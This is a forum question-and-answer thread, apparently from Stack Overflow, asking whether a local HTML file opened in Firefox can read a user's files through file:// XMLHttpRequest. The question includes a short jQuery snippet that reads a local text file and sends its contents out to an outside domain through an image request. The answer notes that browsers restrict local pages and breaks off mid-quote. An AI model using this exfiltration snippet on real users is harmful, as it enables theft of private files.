Let's talk about security. It seems to me, theoretically, I can get information from file system of a user with some script, if the user opens html file with it (opens from his file system, not from network). Look at the code:
info.txt:
my info
index.html:
<!doctype html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js"></script>
<script>
$(document).ready(function () {
$.get('file:///home/daz/desktop/info.txt', function (data) {
$('<img>').attr('src', 'http://domain.com?data=' + escape(data)).appendTo('body');
}, 'text');
});
</script>
</head>
<body></body>
</html>
Some browers (firefox, for example) allow you to get files from file:// through XmlHttpRequest, so if I guess path to the file, then I can get it's content by ajax. And then I can dinamically add img tag with src leading to my domain with parameters in query string. And browser make a request obediently GET ?data=my%20info%0A domain.com. And on the server side I can parse query string and get the data.
Am I right I can do this? Am I right I can get user's data from his computer if he opens my html file? So I can just say: "Hey, friend, check out this file!" (with 2 restrictions: user should use firefox or something else with similar configuration, and I cannot get files user cannot access because of access rights).
UPDATED:
If it is possible, then why it is possible? Why do they allow you to do such things. Why there is no confirm dialogs or something.
UPDATED 2:
It will be great if someone make a review about this issue. Thanks in advance!
It's less possible than you might think. Various browsers have implemented different restrictions on what local HTML files can do, as described in this post by the Chromium development team:
http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
In particular:
(Note that this post is from 2008; browsers -- especially Chrome -- may have changed significantly since then.)